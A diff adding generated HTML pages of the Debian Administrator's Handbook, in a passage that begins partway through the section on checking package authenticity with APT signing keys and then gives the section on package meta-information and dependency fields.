+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.apt-frontends.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.dist-upgrade.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.package-authentication"></a>6.5. Checking Package Authenticity</h2></div></div></div><a
+          id="id-1.9.14.2"
+          class="indexterm"></a><a
+          id="id-1.9.14.3"
+          class="indexterm"></a><a
+          id="id-1.9.14.4"
+          class="indexterm"></a><a
+          id="id-1.9.14.5"
+          class="indexterm"></a><a
+          id="id-1.9.14.6"
+          class="indexterm"></a><div
+          class="para">
+			Security is very important for Falcot Corp administrators. Accordingly, they need to ensure that they only install packages which are guaranteed to come from Debian with no tampering on the way. A computer cracker could try to add malicious code to an otherwise legitimate package. Such a package, if installed, could do anything the cracker designed it to do, including for instance disclosing passwords or confidential information. To circumvent this risk, Debian provides a tamper-proof seal to guarantee — at install time — that a package really comes from its official maintainer and hasn't been modified by a third party.
+		</div><div
+          class="para">
+			The seal works with a chain of cryptographical hashes and a signature. The signed file is the <code
+            class="filename">Release</code> file, provided by the Debian mirrors. It contains a list of the <code
+            class="filename">Packages</code> files (including their compressed forms, <code
+            class="filename">Packages.gz</code> and <code
+            class="filename">Packages.xz</code>, and the incremental versions), along with their MD5, SHA1 and SHA256 hashes, which ensures that the files haven't been tampered with. These <code
+            class="filename">Packages</code> files contain a list of the Debian packages available on the mirror, along with their hashes, which ensures in turn that the contents of the packages themselves haven't been altered either.
+		</div><a
+          id="id-1.9.14.9"
+          class="indexterm"></a><a
+          id="id-1.9.14.10"
+          class="indexterm"></a><a
+          id="id-1.9.14.11"
+          class="indexterm"></a><a
+          id="id-1.9.14.12"
+          class="indexterm"></a><div
+          class="para">
+			APT needs a set of trusted GnuPG public keys to verify signatures in the <code
+            class="filename">Release.gpg</code> files available on the mirrors. It gets them from files in <code
+            class="filename">/etc/apt/trusted.gpg.d/</code> and from the <code
+            class="filename">/etc/apt/trusted.gpg</code> keyring (managed by the <code
+            class="command">apt-key</code> command). The official Debian keys are provided and kept up-to-date by the <span
+            class="pkg pkg">debian-archive-keyring</span> package which puts them in <code
+            class="filename">/etc/apt/trusted.gpg.d/</code>. Note however that the first installation of this particular package requires caution: even if the package is signed like any other, the signature cannot be verified externally. Cautious administrators should therefore check the fingerprints of imported keys before trusting them to install new packages:
+		</div><pre
+          class="screen scale"># <strong
+            class="userinput"><code>apt-key fingerprint</code></strong>
+/etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg
+----------------------------------------------------------
+pub   rsa4096 2014-11-21 [SC] [expires: 2022-11-19]
+      126C 0D24 BD8A 2942 CC7D  F8AC 7638 D044 2B90 D010
+uid           [ unknown] Debian Archive Automatic Signing Key (8/jessie) &lt;ftpmaster@debian.org&gt;
+
+/etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg
+-------------------------------------------------------------------
+pub   rsa4096 2014-11-21 [SC] [expires: 2022-11-19]
+      D211 6914 1CEC D440 F2EB  8DDA 9D6D 8F6B C857 C906
+uid           [ unknown] Debian Security Archive Automatic Signing Key (8/jessie) &lt;ftpmaster@debian.org&gt;
+
+/etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg
+-------------------------------------------------------
+pub   rsa4096 2013-08-17 [SC] [expires: 2021-08-15]
+      75DD C3C4 A499 F1A1 8CB5  F3C8 CBF8 D6FD 518E 17E1
+uid           [ unknown] Jessie Stable Release Key &lt;debian-release@lists.debian.org&gt;
+
+/etc/apt/trusted.gpg.d/debian-archive-stretch-automatic.gpg
+-----------------------------------------------------------
+pub   rsa4096 2017-05-22 [SC] [expires: 2025-05-20]
+      E1CF 20DD FFE4 B89E 8026  58F1 E0B1 1894 F66A EC98
+uid           [ unknown] Debian Archive Automatic Signing Key (9/stretch) &lt;ftpmaster@debian.org&gt;
+sub   rsa4096 2017-05-22 [S] [expires: 2025-05-20]
+
+/etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg
+--------------------------------------------------------------------
+pub   rsa4096 2017-05-22 [SC] [expires: 2025-05-20]
+      6ED6 F5CB 5FA6 FB2F 460A  E88E EDA0 D238 8AE2 2BA9
+uid           [ unknown] Debian Security Archive Automatic Signing Key (9/stretch) &lt;ftpmaster@debian.org&gt;
+sub   rsa4096 2017-05-22 [S] [expires: 2025-05-20]
+
+/etc/apt/trusted.gpg.d/debian-archive-stretch-stable.gpg
+--------------------------------------------------------
+pub   rsa4096 2017-05-20 [SC] [expires: 2025-05-18]
+      067E 3C45 6BAE 240A CEE8  8F6F EF0F 382A 1A7B 6500
+uid           [ unknown] Debian Stable Release Key (9/stretch) &lt;debian-release@lists.debian.org&gt;
+
+/etc/apt/trusted.gpg.d/debian-archive-wheezy-automatic.gpg
+----------------------------------------------------------
+pub   rsa4096 2012-04-27 [SC] [expires: 2020-04-25]
+      A1BD 8E9D 78F7 FE5C 3E65  D8AF 8B48 AD62 4692 5553
+uid           [ unknown] Debian Archive Automatic Signing Key (7.0/wheezy) &lt;ftpmaster@debian.org&gt;
+
+/etc/apt/trusted.gpg.d/debian-archive-wheezy-stable.gpg
+-------------------------------------------------------
+pub   rsa4096 2012-05-08 [SC] [expires: 2019-05-07]
+      ED6D 6527 1AAC F0FF 15D1  2303 6FB2 A1C2 65FF B764
+uid           [ unknown] Wheezy Stable Release Key &lt;debian-release@lists.debian.org&gt;
+</pre><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>IN PRACTICE</em></span> Adding trusted keys</strong></p></div></div></div><a
+            id="id-1.9.14.15.2"
+            class="indexterm"></a><a
+            id="id-1.9.14.15.3"
+            class="indexterm"></a><div
+            class="para">
+			When a third-party package source is added to the <code
+              class="filename">sources.list</code> file, APT needs to be told to trust the corresponding GPG authentication key (otherwise it will keep complaining that it can't ensure the authenticity of the packages coming from that repository). The first step is of course to get the public key. More often than not, the key will be provided as a small text file, which we will call <code
+              class="filename">key.asc</code> in the following examples.
+		</div><div
+            class="para">
+			To add the key to the trusted keyring, the administrator can just put it in a <code
+              class="filename">*.asc</code> file in <code
+              class="filename">/etc/apt/trusted.gpg.d/</code>. This is supported since Debian <span
+              class="distribution distribution">Stretch</span>. With older releases, you had to run <code
+              class="command">apt-key add &lt; key.asc</code>.
+		</div><a
+            id="id-1.9.14.15.6"
+            class="indexterm"></a><div
+            class="para">
+			For people who would want a dedicated application and more details on the trusted keys, it is possible to use <code
+              class="command">gui-apt-key</code> (in the package of the same name), a small graphical user interface which manages the trusted keyring.
+		</div></div><div
+          class="para">
+			Once the appropriate keys are in the keyring, APT will check the signatures before any risky operation, so that front-ends will display a warning if asked to install a package whose authenticity can't be ascertained.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.apt-frontends.html"><strong>Předcházející</strong>6.4. Frontends: aptitude, synaptic</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.dist-upgrade.html"><strong>Další</strong>6.6. Upgrading from One Stable Distribution to th...</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.package-meta-information.html b/tmp/cs-CZ/html/sect.package-meta-information.html
new file mode 100644
index 000000000..7314ef0b9
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.package-meta-information.html
@@ -0,0 +1,821 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">5.2. Package Meta-Information</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Binary package, Source package, dpkg, dependencies, conflict" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="packaging-system.html"
+        title="Kapitola 5. Packaging System: Tools and Fundamental Principles" /><link
+        rel="prev"
+        href="packaging-system.html"
+        title="Kapitola 5. Packaging System: Tools and Fundamental Principles" /><link
+        rel="next"
+        href="sect.source-package-structure.html"
+        title="5.3. Structure of a Source Package" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.package-meta-information.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="packaging-system.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.source-package-structure.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.package-meta-information"></a>5.2. Package Meta-Information</h2></div></div></div><a
+          id="id-1.8.6.2"
+          class="indexterm"></a><a
+          id="id-1.8.6.3"
+          class="indexterm"></a><div
+          class="para">
+			The Debian package is not only an archive of files intended for installation. It is part of a larger whole, and it describes its relationship with other Debian packages (dependencies, conflicts, suggestions). It also provides scripts that enable the execution of commands at different stages in the package's lifecycle (installation, removal, upgrades). These data are used by the package management tools but are not part of the packaged software; they are, within the package, what is called its “meta-information” (information about other information).
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.control"></a>5.2.1. Description: the <code
+                    class="filename">control</code> File</h3></div></div></div><a
+            id="id-1.8.6.5.2"
+            class="indexterm"></a><a
+            id="id-1.8.6.5.3"
+            class="indexterm"></a><a
+            id="id-1.8.6.5.4"
+            class="indexterm"></a><div
+            class="para">
+				This file uses a structure similar to email headers (as defined by RFC 2822). For example, for <span
+              class="pkg pkg">apt</span>, the <code
+              class="filename">control</code> file looks like the following:
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>apt-cache show apt</code></strong>
+<code
+              class="computeroutput">Package: apt
+Version: 1.4.8
+Installed-Size: 3539
+Maintainer: APT Development Team &lt;deity@lists.debian.org&gt;
+Architecture: amd64
+Replaces: apt-utils (&lt;&lt; 1.3~exp2~)
+Depends: adduser, gpgv | gpgv2 | gpgv1, debian-archive-keyring, init-system-helpers (&gt;= 1.18~), libapt-pkg5.0 (&gt;= 1.3~rc2), libc6 (&gt;= 2.15), libgcc1 (&gt;= 1:3.0), libstdc++6 (&gt;= 5.2)
+Recommends: gnupg | gnupg2 | gnupg1
+Suggests: apt-doc, aptitude | synaptic | wajig, dpkg-dev (&gt;= 1.17.2), powermgmt-base, python-apt
+Breaks: apt-utils (&lt;&lt; 1.3~exp2~)
+Description-en: commandline package manager
+ This package provides commandline tools for searching and
+ managing as well as querying information about packages
+ as a low-level access to all features of the libapt-pkg library.
+ .
+ These include:
+  * apt-get for retrieval of packages and information about them
+    from authenticated sources and for installation, upgrade and
+    removal of packages together with their dependencies
+  * apt-cache for querying available information about installed
+    as well as installable packages
+  * apt-cdrom to use removable media as a source for packages
+  * apt-config as an interface to the configuration settings
+  * apt-key as an interface to manage authentication keys
+Description-md5: 9fb97a88cb7383934ef963352b53b4a7
+Tag: admin::package-management, devel::lang:ruby, hardware::storage,
+ hardware::storage:cd, implemented-in::c++, implemented-in::perl,
+ implemented-in::ruby, interface::commandline, network::client,
+ protocol::ftp, protocol::http, protocol::ipv6, role::program,
+ scope::application, scope::utility, sound::player, suite::debian,
+ use::downloading, use::organizing, use::searching, works-with::audio,
+ works-with::software:package, works-with::text
+Section: admin
+Priority: important
+Filename: pool/main/a/apt/apt_1.4.8_amd64.deb
+Size: 1231676
+MD5sum: 4963240f23156b2dda3affc9c0d416a3
+SHA256: bc319a3abaf98d76e7e13ac97ab0ee7c238a48e2d4ab85524be8b10cfd23d50d</code></pre><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> RFC — Internet standards</strong></p></div></div></div><a
+              id="id-1.8.6.5.7.2"
+              class="indexterm"></a><a
+              id="id-1.8.6.5.7.3"
+              class="indexterm"></a><div
+              class="para">
+				RFC is the abbreviation of “Request For Comments”. An RFC is generally a technical document that describes what will become an Internet standard. Before becoming standardized and frozen, these standards are submitted for public review (hence their name). The IETF (Internet Engineering Task Force) decides on the evolution of the status of these documents (proposed standard, draft standard, or standard).
+			</div><div
+              class="para">
+				RFC 2026 defines the process for standardization of Internet protocols. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.faqs.org/rfcs/rfc2026.html">http://www.faqs.org/rfcs/rfc2026.html</a></div>
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.8.6.5.8"></a>5.2.1.1. Dependencies: the <code
+                      class="literal">Depends</code> Field</h4></div></div></div><a
+              id="id-1.8.6.5.8.2"
+              class="indexterm"></a><a
+              id="id-1.8.6.5.8.3"
+              class="indexterm"></a><a
+              id="id-1.8.6.5.8.4"
+              class="indexterm"></a><div
+              class="para">
+					The dependencies are defined in the <code
+                class="literal">Depends</code> field in the package header. This is a list of conditions to be met for the package to work correctly — this information is used by tools such as <code
+                class="command">apt</code> in order to install the required libraries, in appropriate versions fulfilling the dependencies of the package to be installed. For each dependency, it is possible to restrict the range of versions that meet that condition. In other words, it is possible to express the fact that we need the package <span
+                class="pkg pkg">libc6</span> in a version equal to or greater than “2.15” (written “<code
+                class="command">libc6 (&gt;= 2.15)</code>”). Version comparison operators are as follows:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="command">&lt;&lt;</code>: less than;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="command">&lt;=</code>: less than or equal to;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="command">=</code>: equal to (note that “<code
+                      class="literal">2.6.1</code>” is not equal to “<code
+                      class="literal">2.6.1-1</code>”);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="command">&gt;=</code>: greater than or equal to;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="command">&gt;&gt;</code>: greater than.
+						</div></li></ul></div><div
+              class="para">
+					In a list of conditions to be met, the comma serves as a separator. It must be interpreted as a logical “and”. In conditions, the vertical bar (“|”) expresses a logical “or” (it is an inclusive “or”, not an exclusive “either/or”). Carrying greater priority than “and”, it can be used as many times as necessary. Thus, the dependency “(A or B) and C” is written <code
+                class="command">A | B, C</code>. In contrast, the expression “A or (B and C)” should be written as “(A or B) and (A or C)”, since the <code
+                class="literal">Depends</code> field does not tolerate parentheses that change the order of priorities between the logical operators “or” and “and”. It would thus be written <code
+                class="command">A | B, A | C</code>. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.debian.org/doc/debian-policy/#document-ch-relationships">https://www.debian.org/doc/debian-policy/#document-ch-relationships</a></div>
+				</div><a
+              id="id-1.8.6.5.8.8"
+              class="indexterm"></a><div
+              class="para">
+					The dependencies system is a good mechanism for guaranteeing the operation of a program, but it has another use with “meta-packages”. These are empty packages that only describe dependencies. They facilitate the installation of a consistent group of programs preselected by the meta-package maintainer; as such, <code
+                class="command">apt install <em
+                  class="replaceable">meta-package</em></code> will automatically install all of these programs using the meta-package's dependencies. The <span
+                class="pkg pkg">gnome</span>, <span
+                class="pkg pkg">kde-full</span> and <span
+                class="pkg pkg">linux-image-amd64</span> packages are examples of meta-packages.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>DEBIAN POLICY</em></span> <code
+                          class="literal">Pre-Depends</code>, a more demanding <code
+                          class="literal">Depends</code> </strong></p></div></div></div><a
+                id="id-1.8.6.5.8.10.2"
+                class="indexterm"></a><a
+                id="id-1.8.6.5.8.10.3"
+                class="indexterm"></a><div
+                class="para">
+					“Pre-dependencies”, which are listed in the “<code
+                  class="literal">Pre-Depends</code>” field in the package headers, complete the normal dependencies; their syntax is identical. A normal dependency indicates that the package in question must be unpacked and configured before configuration of the package declaring the dependency. A pre-dependency stipulates that the package in question must be unpacked and configured before execution of the pre-installation script of the package declaring the pre-dependency, that is before its installation.
+				</div><div
+                class="para">
+					A pre-dependency is very demanding for <code
+                  class="command">apt</code>, because it adds a strict constraint on the ordering of the packages to install. As such, pre-dependencies are discouraged unless absolutely necessary. It is even recommended to consult other developers on <code
+                  class="email"><a
+                    class="email"
+                    href="mailto:debian-devel@lists.debian.org">debian-devel@lists.debian.org</a></code> before adding a pre-dependency. It is generally possible to find another solution as a work-around.
+				</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>DEBIAN POLICY</em></span> <code
+                          class="literal">Recommends</code>, <code
+                          class="literal">Suggests</code>, and <code
+                          class="literal">Enhances</code> fields</strong></p></div></div></div><a
+                id="id-1.8.6.5.8.11.2"
+                class="indexterm"></a><a
+                id="id-1.8.6.5.8.11.3"
+                class="indexterm"></a><div
+                class="para">
+					The <code
+                  class="literal">Recommends</code> and <code
+                  class="literal">Suggests</code> fields describe dependencies that are not compulsory. The “recommended” dependencies, the most important, considerably improve the functionality offered by the package but are not indispensable to its operation. The “suggested” dependencies, of secondary importance, indicate that certain packages may complement and increase their respective utility, but it is perfectly reasonable to install one without the others.
+				</div><div
+                class="para">
+					You should always install the “recommended” packages, unless you know exactly why you do not need them. Conversely, it is not necessary to install “suggested” packages unless you know why you need them.
+				</div><a
+                id="id-1.8.6.5.8.11.6"
+                class="indexterm"></a><div
+                class="para">
+					The <code
+                  class="literal">Enhances</code> field also describes a suggestion, but in a different context. It is indeed located in the suggested package, and not in the package that benefits from the suggestion. Its interest lies in that it is possible to add a suggestion without having to modify the package that is concerned. Thus, all add-ons, plug-ins, and other extensions of a program can then appear in the list of suggestions related to the software. Although it has existed for several years, this last field is still largely ignored by programs such as <code
+                  class="command">apt</code> or <code
+                  class="command">synaptic</code>. Its purpose is for a suggestion made by the <code
+                  class="literal">Enhances</code> field to appear to the user in addition to the traditional suggestions — found in the <code
+                  class="literal">Suggests</code> field.
+				</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.8.6.5.9"></a>5.2.1.2. Conflicts: the <code
+                      class="literal">Conflicts</code> field</h4></div></div></div><a
+              id="id-1.8.6.5.9.2"
+              class="indexterm"></a><a
+              id="id-1.8.6.5.9.3"
+              class="indexterm"></a><a
+              id="id-1.8.6.5.9.4"
+              class="indexterm"></a><div
+              class="para">
+					The <code
+                class="literal">Conflicts</code> field indicates when a package cannot be installed simultaneously with another. The most common reasons for this are that both packages include a file of the same name, or provide the same service on the same TCP port, or would hinder each other's operation.
+				</div><div
+              class="para">
+					<code
+                class="command">dpkg</code> will refuse to install a package if it triggers a conflict with an already installed package, except if the new package specifies that it will “replace” the installed package, in which case <code
+                class="command">dpkg</code> will choose to replace the old package with the new one. <code
+                class="command">apt</code> always follows your instructions: if you choose to install a new package, it will automatically offer to uninstall the package that poses a problem.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.8.6.5.10"></a>5.2.1.3. Incompatibilities: the <code
+                      class="literal">Breaks</code> Field</h4></div></div></div><a
+              id="id-1.8.6.5.10.2"
+              class="indexterm"></a><a
+              id="id-1.8.6.5.10.3"
+              class="indexterm"></a><a
+              id="id-1.8.6.5.10.4"
+              class="indexterm"></a><div
+              class="para">
+					The <code
+                class="literal">Breaks</code> field has an effect similar to that of the <code
+                class="literal">Conflicts</code> field, but with a special meaning. It signals that the installation of a package will “break” another package (or particular versions of it). In general, this incompatibility between two packages is transitory, and the <code
+                class="literal">Breaks</code> relationship specifically refers to the incompatible versions.
+				</div><div
+              class="para">
+					<code
+                class="command">dpkg</code> will refuse to install a package that breaks an already installed package, and <code
+                class="command">apt</code> will try to resolve the problem by updating the package that would be broken to a newer version (which is assumed to be fixed and, thus, compatible again).
+				</div><div
+              class="para">
+					This type of situation may occur in the case of updates without backwards compatibility: this is the case if the new version no longer functions with the older version, and causes a malfunction in another program without making special provisions. The <code
+                class="literal">Breaks</code> field prevents the user from running into these problems.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.8.6.5.11"></a>5.2.1.4. Provided Items: the <code
+                      class="literal">Provides</code> Field</h4></div></div></div><a
+              id="id-1.8.6.5.11.2"
+              class="indexterm"></a><div
+              class="para">
+					This field introduces the very interesting concept of a “virtual package”. It has many roles, but two are of particular importance. The first role consists in using a virtual package to associate a generic service with it (the package “provides” the service). The second indicates that a package completely replaces another, and that for this purpose it can also satisfy the dependencies that the other would satisfy. It is thus possible to create a substitution package without having to use the same package name.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>VOCABULARY</em></span> Meta-package and virtual package</strong></p></div></div></div><a
+                id="id-1.8.6.5.11.4.2"
+                class="indexterm"></a><a
+                id="id-1.8.6.5.11.4.3"
+                class="indexterm"></a><a
+                id="id-1.8.6.5.11.4.4"
+                class="indexterm"></a><div
+                class="para">
+					It is essential to clearly distinguish meta-packages from virtual packages. The former are real packages (including real <code
+                  class="filename">.deb</code> files), whose only purpose is to express dependencies.
+				</div><div
+                class="para">
+					Virtual packages, however, do not exist physically; they are only a means of identifying real packages based on common, logical criteria (service provided, compatibility with a standard program or a pre-existing package, etc.).
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.8.6.5.11.5"></a>5.2.1.4.1. Providing a “Service”</h5></div></div></div><div
+                class="para">
+						Let us discuss the first case in greater detail with an example: all mail servers, such as <span
+                  class="pkg pkg">postfix</span> or <span
+                  class="pkg pkg">sendmail</span> are said to “provide” the <span
+                  class="pkg pkg">mail-transport-agent</span> virtual package. Thus, any package that needs this service to be functional (e.g. a mailing list manager, such as <span
+                  class="pkg pkg">smartlist</span> or <span
+                  class="pkg pkg">sympa</span>) simply states in its dependencies that it requires a <span
+                  class="pkg pkg">mail-transport-agent</span> instead of specifying a large yet incomplete list of possible solutions (e.g. <code
+                  class="command">postfix | sendmail | exim4 | …</code>). Furthermore, it is useless to install two mail servers on the same machine, which is why each of these packages declares a conflict with the <span
+                  class="pkg pkg">mail-transport-agent</span> virtual package. A conflict between a package and itself is ignored by the system, but this technique will prohibit the installation of two mail servers side by side.
+					</div><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>DEBIAN POLICY</em></span> List of virtual packages</strong></p></div></div></div><a
+                  id="id-1.8.6.5.11.5.3.2"
+                  class="indexterm"></a><div
+                  class="para">
+						For virtual packages to be useful, everyone must agree on their name. This is why they are standardized in the Debian Policy. The list includes among others <span
+                    class="pkg pkg">mail-transport-agent</span> for mail servers, <span
+                    class="pkg pkg">c-compiler</span> for C programming language compilers, <span
+                    class="pkg pkg">www-browser</span> for web browsers, <span
+                    class="pkg pkg">httpd</span> for web servers, <span
+                    class="pkg pkg">ftp-server</span> for FTP servers, <span
+                    class="pkg pkg">x-terminal-emulator</span> for terminal emulators in graphical mode (<code
+                    class="command">xterm</code>), and <span
+                    class="pkg pkg">x-window-manager</span> for window managers.
+					</div><div
+                  class="para">
+						The full list can be found on the Web. <div
+                    xmlns=""
+                    class="url">→ <a
+                      xmlns="http://www.w3.org/1999/xhtml"
+                      href="http://www.debian.org/doc/packaging-manuals/virtual-package-names-list.txt">http://www.debian.org/doc/packaging-manuals/virtual-package-names-list.txt</a></div>
+					</div></div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.8.6.5.11.6"></a>5.2.1.4.2. Interchangeability with Another Package</h5></div></div></div><div
+                class="para">
+						The <code
+                  class="literal">Provides</code> field is also interesting when the content of a package is included in a larger package. For example, the <span
+                  class="pkg pkg">libdigest-md5-perl</span> Perl module was an optional module in Perl 5.6, and has been integrated as standard in Perl 5.8 (and later versions, such as 5.24 present in <span
+                  class="distribution distribution">Stretch</span>). As such, the package <span
+                  class="pkg pkg">perl</span> has since version 5.8 declared <code
+                  class="literal">Provides: libdigest-md5-perl</code> so that the dependencies on this package are met if the user has Perl 5.8 (or newer). The <span
+                  class="pkg pkg">libdigest-md5-perl</span> package itself has eventually been deleted, since it no longer had any purpose when old Perl versions were removed.
+					</div><div
+                class="figure"><a
+                  xmlns=""
+                  id="id-1.8.6.5.11.6.3"></a><div
+                  class="figure-contents"><div
+                    class="mediaobject"><img
+                      src="images/virtual-package.png"
+                      alt="Use of a Provides field in order to not break dependencies" /></div></div><p
+                  class="title"><strong>Obrázek 5.1. Use of a <code
+                      class="literal">Provides</code> field in order to not break dependencies</strong></p></div><div
+                class="para">
+						This feature is very useful, since it is never possible to anticipate the vagaries of development, and it is necessary to be able to adjust to renaming, and other automatic replacement, of obsolete software.
+					</div><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>BACK TO BASICS</em></span> Perl, a programming language</strong></p></div></div></div><a
+                  id="id-1.8.6.5.11.6.5.2"
+                  class="indexterm"></a><a
+                  id="id-1.8.6.5.11.6.5.3"
+                  class="indexterm"></a><div
+                  class="para">
+						Perl (Practical Extraction and Report Language) is a very popular programming language. It has many ready-to-use modules that cover a vast spectrum of applications, and that are distributed by the CPAN (Comprehensive Perl Archive Network) servers, an exhaustive network of Perl packages. <div
+                    xmlns=""
+                    class="url">→ <a
+                      xmlns="http://www.w3.org/1999/xhtml"
+                      href="http://www.perl.org/">http://www.perl.org/</a></div> <div
+                    xmlns=""
+                    class="url">→ <a
+                      xmlns="http://www.w3.org/1999/xhtml"
+                      href="http://www.cpan.org/">http://www.cpan.org/</a></div>
+					</div><div
+                  class="para">
+						Since it is an interpreted language, a program written in Perl does not require compilation prior to execution. This is why they are called “Perl scripts”.
+					</div></div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.8.6.5.11.7"></a>5.2.1.4.3. Past Limitations</h5></div></div></div><div
+                class="para">
+						Virtual packages used to suffer from some limitations, the most significant of which was the absence of a version number. To return to the previous example, a dependency such as <code
+                  class="literal">Depends: libdigest-md5-perl (&gt;= 1.6)</code>, despite the presence of Perl 5.10, would never be considered as satisfied by the packaging system — while in fact it most likely is satisfied. Unaware of this, the package system chose the least risky option, assuming that the versions do not match.
+					</div><div
+                class="para">
+						This limitation has been lifted in <span
+                  class="pkg pkg">dpkg</span> 1.17.11, and is no longer relevant in Stretch. Packages can assign a version to the virtual packages they provide with a dependency such as <code
+                  class="literal">Provides: libdigest-md5-perl (= 1.8)</code>.
+					</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.8.6.5.12"></a>5.2.1.5. Replacing Files: The <code
+                      class="literal">Replaces</code> Field</h4></div></div></div><a
+              id="id-1.8.6.5.12.2"
+              class="indexterm"></a><a
+              id="id-1.8.6.5.12.3"
+              class="indexterm"></a><a
+              id="id-1.8.6.5.12.4"
+              class="indexterm"></a><div
+              class="para">
+					The <code
+                class="literal">Replaces</code> field indicates that the package contains files that are also present in another package, but that the package is legitimately entitled to replace them. Without this specification, <code
+                class="command">dpkg</code> fails, stating that it can not overwrite the files of another package (technically, it is possible to force it to do so with the <code
+                class="literal">--force-overwrite</code> option, but that is not considered standard operation). This allows identification of potential problems and requires the maintainer to study the matter prior to choosing whether to add such a field.
+				</div><div
+              class="para">
+					The use of this field is justified when package names change or when a package is included in another. This also happens when the maintainer decides to distribute files differently among various binary packages produced from the same source package: a replaced file no longer belongs to the old package, but only to the new one.
+				</div><div
+              class="para">
+					If all of the files in an installed package have been replaced, the package is considered to be removed. Finally, this field also encourages <code
+                class="command">dpkg</code> to remove the replaced package where there is a conflict.
+				</div><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.debtags"></a><div
+                class="titlepage"><div><div><p
